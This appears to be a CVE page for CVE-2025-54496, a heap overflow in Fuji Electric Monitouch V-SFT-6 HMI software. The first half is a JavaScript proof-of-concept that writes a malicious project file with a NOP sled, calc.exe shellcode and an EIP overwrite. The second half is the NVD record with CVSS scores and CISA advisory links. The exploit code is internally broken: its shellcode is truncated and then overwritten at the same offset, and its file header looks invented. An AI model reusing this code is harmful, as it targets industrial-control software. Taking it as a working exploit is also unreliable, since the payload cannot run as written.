CVE-2025-54496

// CVE-2025-54496 PoC - Malicious Project File Generator // Target: Fuji Electric Monitouch V-SFT-6 // Vulnerability: Heap-based Buffer Overflow const fs = require('fs'); // V-SFT-6 project file header structure const PROJECT_HEADER = Buffer.alloc(64); PROJECT_HEADER.write('VSFT', 0, 4, 'ascii'); // Magic bytes PROJECT_HEADER.writeUInt32LE(0x0006, 4); // Version 6 PROJECT_HEADER.writeUInt32LE(0x0100, 8); // File format version // Craft malicious payload to trigger heap overflow // EIP control via overflow of heap buffer const HEAP_OVERFLOW_SIZE = 1024; const MALICIOUS_PAYLOAD = Buffer.alloc(HEAP_OVERFLOW_SIZE); // Fill with NOP sled MALICIOUS_PAYLOAD.fill(0x90, 0, HEAP_OVERFLOW_SIZE - 16); // Shellcode for code execution (calc.exe) const SHELLCODE = Buffer.from([ 0x90, 0x90, // NOP 0xB8, 0x00, 0x00, 0x00, 0x00, // mov eax, 0 0x50, // push eax 0x68, 0x2E, 0x65, 0x78, 0x65, // push 'exe.' 0x68, 0x63, 0x61, 0x6C, 0x63, // push 'calc' 0x54, // push esp 0x50, // push eax 0xB8, 0x00, 0x00, 0x00, 0x00, // mov eax, 0 0xFF, 0xD0 // call eax ]); SHELLCODE.copy(MALICIOUS_PAYLOAD, HEAP_OVERFLOW_SIZE - 16); // Overwrite pointer to control EIP const EIP_OVERWRITE = Buffer.alloc(16); EIP_OVERWRITE.writeUInt32LE(0x41414141, 0); // Overwrite pointer EIP_OVERWRITE.copy(MALICIOUS_PAYLOAD, HEAP_OVERFLOW_SIZE - 16); // Combine all parts const pocFile = Buffer.concat([PROJECT_HEADER, MALICIOUS_PAYLOAD]); // Save malicious project file fs.writeFileSync('CVE-2025-54496_malicious.vsp', pocFile); console.log('PoC file created: CVE-2025-54496_malicious.vsp'); console.log('File size:', pocFile.length, 'bytes');

{"cve": {"id": "CVE-2025-54496", "sourceIdentifier": "[email protected]", "published": "2025-11-04T22:16:28.560", "lastModified": "2025-11-12T17:17:25.483", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A maliciously crafted project file may cause a heap-based buffer \noverflow in \nFuji Electric Monitouch V-SFT-6, which may allow the attacker to execute arbitrary code."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-122"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fujielectric:monitouch_v-sft:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2.7.0", "versionEndExcluding": "6.2.9.0", "matchCriteriaId": "704D6052-EE4D-43D8-A03E-53F1E26072BC"}]}]}], "references": [{"url": "https://felib.fujielectric.co.jp/en/document_search?tab=software&document1%5B1%5D=M10009&document2%5B1%5D=M20104&product1%5B1%5D=P10003&product2%5B1%5D=P20023&product3%5B1%5D=P30623&product4%5B1%5D=S11133&discontinued%5B1%5D=0&count=20&sort=en_title&page=1&region=en-glb", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2025/icsa-25-308-01.json", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-25-308-01", "source": "[email protected]", "tags": ["Third Party Advisory", "US Government Resource"]}]}}